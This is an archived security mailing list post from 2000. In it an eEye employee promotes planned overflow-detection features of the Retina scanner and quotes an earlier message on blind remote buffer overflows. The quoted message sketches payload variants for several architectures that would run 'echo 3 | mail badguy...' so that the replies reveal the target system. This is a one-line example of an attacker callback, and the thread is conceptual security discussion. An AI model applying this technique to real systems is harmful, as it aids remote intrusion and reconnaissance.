Vulnerability Development mailing list archives
Re: Blind Remote Buffer Overflow
From: marc () EEYE COM (Marc)
Date: Mon, 1 May 2000 17:36:40 -0700
Since you mentioned eEye... The beta that is on our website does not "scan for unknown exploits." So wait till after May 15th and then give Retina a try it WILL have CHAM (Common Hacking Attack Method) modules. Retina 1.0 will be able to find the overflows and Retina 1.2 or 1.5 should be able to find the exact overflow length. We also have plans for shell code inserti er well I cant get into the rest of it. ;-] Signed, Marc eEye Digital Security http://www.eEye.com P.S. If anyone is going to networld+interop be sure to check out eEye/eCompany's booth. How will you find us you ask? We will be the "non-heard of sheep sporting polo shirts and khakis" We will have black t-shirts on that poke fun at the NSA, dyed hair and tequila. :-] hmm interesting... NSA was not in the default dictionary for MS's spell checker. | -----Original Message----- | From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of | Bluefish | Sent: Monday, May 01, 2000 6:42 PM | To: VULN-DEV () SECURITYFOCUS COM | Subject: Re: Blind Remote Buffer Overflow | | | Uhm... | | To begin with, in most situations it seems unrecommended to assume the | attacker is blind. But if he really is? | | Some people have mentioned some ways to try to find a vulnerability | remotely. Now, lets say you using some way have determined you can rewrite | EIP, PC (or whatever it's called on your architecture). What now to do to | detect operating system and architecture? | | I believe a 'generic buffert overflower' could be a part of answer. Let a | tool be given what you know (or guess) about the overflow. Let it generate | a number of variants (as an example: Linux/i386, Linux/sparc, | Windows/i386) which all of them does something like "echo 3 | mail | badguy () test com". Depending upon what mail you actually get back, you know | that the architecture is at least quite compatible with the envioronents | that returns an answer. | | It does seem like quite some work, but it does (IMHO) show that a even if | a system has secret sourcecode and secret binaries as well, it's not | possible to provide security through obscurity. If such scans could be | automated, it would rise a need even for programs which only exists on a | single system to be coded quite well. | | The group/company at www.eeye.com has a tool which can be used to scan for | unknown exploits if you give it some information to it about "where you | want to go today" (grin). I don't know how good it is, but perhaps | the support of 'blind overlows' to detect systems can be incorperated into | their scanner. | | ..:::::::::::::::::::::::::::::::::::::::::::::::::.. | http://www.11a.nu || http://bluefish.11a.nu | eleventh alliance development & security team |
Current thread:
- Re: Blind Remote Buffer Overflow Ex Machina (Apr 30)
- <Possible follow-ups>
- Re: Blind Remote Buffer Overflow Matthew R. Potter (Apr 30)
- Re: Blind Remote Buffer Overflow Arturo Busleiman (Apr 30)
- Re: Blind Remote Buffer Overflow Ralph The Wonder Llama (May 01)
- Re: Blind Remote Buffer Overflow Granquist, Lamont (May 01)
- Re: Blind Remote Buffer Overflow Reinier Heeres (May 02)
- Re: Blind Remote Buffer Overflow Matthew R. Potter (May 02)
- Re: Blind Remote Buffer Overflow Jani Ollikainen (May 02)
- Re: Blind Remote Buffer Overflow Granquist, Lamont (May 01)
- Re: Blind Remote Buffer Overflow Bluefish (May 01)
- Re: Blind Remote Buffer Overflow Marc (May 01)
- Re: Blind Remote Buffer Overflow Blue Boar (May 01)
- Re: Blind Remote Buffer Overflow matej (May 01)
- Re: Blind Remote Buffer Overflow Pavol Luptak (May 02)
- Ascii-x86 was: Blind Remote Buffer Overflow Bluefish (May 03)
- Re: Ascii-x86 was: Blind Remote Buffer Overflow Robert Collins (May 03)
- Re: Ascii-x86 was: Blind Remote Buffer Overflow Bill Weiss (May 03)
- firewall audit LEOW Chiun-Yi Jonathan (May 03)
- Re: firewall audit Ron DuFresne (May 03)
- Re: firewall audit antirez (May 04)
- Re: firewall audit Bennett Todd (May 04)